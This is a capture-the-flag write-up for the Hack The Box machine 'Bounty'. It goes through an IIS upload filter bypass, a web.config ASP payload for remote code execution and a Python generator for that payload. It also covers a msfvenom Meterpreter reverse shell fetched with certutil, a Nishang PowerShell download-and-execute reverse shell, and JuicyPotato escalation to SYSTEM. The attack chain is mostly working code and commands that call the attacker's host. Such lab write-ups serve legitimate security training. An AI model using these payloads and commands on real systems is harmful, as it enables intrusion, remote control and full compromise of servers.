
Information

nmap

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -p- --min-rate 10000 10.10.10.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 08:21 EDT
Nmap scan report for 10.10.10.93
Host is up (0.26s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 50.01 seconds

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -sC -sV -p 80 10.10.10.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 08:22 EDT
Nmap scan report for 10.10.10.93
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.38 seconds

WEB shell

basic information

Browse to the web page and check what the browser fingerprinting plugin reports:

Matching the IIS version against Windows releases (IIS 7.5 ships with Windows Server 2008 R2 / Windows 7), the target should be Windows Server 2008 R2.

File Upload

/transfer.aspx

This looks like a file upload form, so try uploading. Pick a valid image file and upload it; the response reads "successfuly".

Change the extension to "aspx" and resend the request; this time the response is "Invalid file".

BruteForce

Put the other ASP-family extensions into a wordlist and brute-force them:

ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

In Burp Intruder, mark the extension as the payload position, load the wordlist, and untick the option to URL-encode payload characters (otherwise the leading "." is sent as %2e and every candidate fails for the wrong reason).

The brute force shows that the .config extension is allowed.

Asp config RCE

The POC for turning this upload into command execution comes from a blog post. Save it as web.config and upload it. Why it works: IIS reads an uploaded web.config as the configuration of that directory. This one maps *.config to the classic ASP ISAPI handler (asp.dll), removes .config from the request-filtering extension blocklist and un-hides the web.config segment, so requesting the file itself runs the ASP placed inside the trailing XML comment. The comment must stay well-formed (no "--" inside it), otherwise IIS rejects the whole configuration.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

After uploading web.config, browse to web.config under /UploadedFiles. If the page shows 3 (the output of Response.write(1+2)), the ASP executed.

Replace the ASP in the POC with command-execution code (this is classic ASP/VBScript driving WScript.Shell, not .aspx). Test with ping: run tcpdump on the VPN interface (tcpdump -i tun0 icmp) and the target's ICMP echo requests arrive locally.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.15")
o = cmd.StdOut.Readall()
Response.write(o)
%>
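An added example (not code from the writeup or from the POC's author) that generates the web.config payload for an arbitrary command and parses the command output back out of the response, covering both the POC step and the ping test above. It keeps the POC's trick of assembling "-->" and "<!--" at runtime, refuses commands containing "--" (which would break the XML comment and make IIS reject the whole web.config with a 500), checks well-formedness before writing the file, and detects the case where the file was served raw instead of executed. The attacker IP and output filename are assumptions.

```python
#!/usr/bin/env python3
"""Generate an IIS web.config that runs a command through asp.dll (added example)."""
import sys
import xml.etree.ElementTree as ET

# Same handler mapping and request-filtering removals as the POC; {CMD} is replaced below.
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- IIS parses this file as XML, so the ASP below must stay inside a valid comment
<%
Response.write("-"&"->")
Set sh = CreateObject("WScript.Shell")
Set p = sh.Exec("cmd /c " & "{CMD}")
Response.write(p.StdOut.ReadAll())
Response.write("<!-"&"-")
%>
-->
"""


def vbs_escape(s):
    """VBScript string literals escape a double quote by doubling it."""
    return s.replace('"', '""')


def build_webconfig(cmd):
    if "--" in cmd:
        raise ValueError("command must not contain '--': it would terminate the XML comment")
    payload = TEMPLATE.replace("{CMD}", vbs_escape(cmd))
    # IIS refuses a malformed web.config outright, so fail here instead of on the server.
    ET.fromstring(payload.encode("utf-8"))
    return payload


def extract_output(body):
    """Command output sits between the '-->' and '<!--' that the ASP code writes.
    Returns None when the file came back raw, i.e. asp.dll never processed it."""
    if "<%" in body:
        return None
    if "-->" not in body:
        return None
    after = body.split("-->", 1)[1]
    return after.split("<!--", 1)[0]


if __name__ == "__main__":
    cmd = " ".join(sys.argv[1:]) or "ping 10.10.14.15"  # attacker IP from the writeup (assumption)
    with open("web.config", "w", newline="\n") as fh:
        fh.write(build_webconfig(cmd))
    print("upload web.config, then GET /UploadedFiles/web.config and feed the body to extract_output()")
```

Because the output is wrapped in an HTML comment, a browser shows a blank page; read the raw response (curl or Burp) or run it through extract_output().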

Msf Shell

Generate the payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f exe >  shell.exe

Set up the listener in msfconsole (exploit/multi/handler with the same payload, LHOST and LPORT).

Use the command execution to pull the payload onto the target: serve it locally over HTTP on port 808 and fetch it with certutil.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("certutil -urlcache -f http://10.10.14.15:808/shell.exe C:\\Users\\Public\\Documents\\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Run the payload with a second command execution:

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Users\Public\Documents\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>

A Meterpreter session then arrives in msfconsole.

privilege

Check the token's privileges (whoami /priv).

The token holds SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, which is exactly the precondition for a Potato-style escalation to SYSTEM.

systeminfo

c:\windows\system32\inetsrv>systeminfo        
systeminfo

Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 8/16/2023, 3:12:27 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,618 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,643 MB
Virtual Memory: In Use: 452 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
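An added example (not from the writeup) that turns the two checks above, whoami /priv and systeminfo, into a small triage: it parses the fixed-width privilege table, lists the impersonation privileges that make JuicyPotato viable, and confirms from the build number that the OS predates the 1809/Server 2019 change that broke JuicyPotato. The whoami /priv and systeminfo text embedded below is constructed sample input modelled on what this box shows.

```python
#!/usr/bin/env python3
"""Triage whoami /priv and systeminfo output for a Potato-style escalation (added example)."""
import re

# Constructed sample in the fixed-width layout whoami /priv prints (not captured from the box).
SAMPLE_PRIVS = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed excerpt in the systeminfo format shown on the page.
SAMPLE_SYSTEMINFO = """\
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
"""

# Privileges that let JuicyPotato and its relatives turn a coerced SYSTEM token into a process.
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Windows 10 1809 / Server 2019 (build 17763) changed the DCOM/OXID behaviour JuicyPotato relies on.
JUICY_POTATO_MAX_BUILD = 17763


def parse_privs(text):
    """Return {privilege_name: state} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs


def potato_candidates(privs):
    """Impersonation privileges present in the token. The State column is not the
    deciding factor: a held-but-disabled privilege can be enabled by the process itself."""
    return [p for p in IMPERSONATION_PRIVS if p in privs]


def parse_build(text):
    """Pull the build number out of the 'OS Version' line of systeminfo."""
    m = re.search(r"Build (\d+)", text)
    return int(m.group(1)) if m else None


def juicy_potato_supported(build):
    return build is not None and build < JUICY_POTATO_MAX_BUILD


if __name__ == "__main__":
    privs = parse_privs(SAMPLE_PRIVS)
    build = parse_build(SAMPLE_SYSTEMINFO)
    for name in potato_candidates(privs):
        print(f"{name}: {privs[name]}")
    print(f"build {build}: JuicyPotato {'applicable' if juicy_potato_supported(build) else 'not applicable'}")
```

On a newer build the same privileges still matter, but the tool choice changes (PrintSpoofer, RoguePotato or similar); the build check is what tells you which.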



Edit Nishang's Shells/Invoke-PowerShellTcp.ps1 and append at the end:

Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6666

Create sh.bat:

powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:808/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -port 6666

Use certutil to transfer both sh.bat and JuicyPotato to the target:

certutil -urlcache -f http://10.10.14.15:808/jp.exe jp.exe

Start a listener locally first (nc -lvnp 6666), then run JuicyPotato with sh.bat as the program to launch (-p), a free local port for its COM listener (-l) and -t * to try both CreateProcessWithTokenW and CreateProcessAsUser; if the default CLSID fails on this build, pass another with -c. The reverse shell that comes back runs as NT AUTHORITY\SYSTEM.
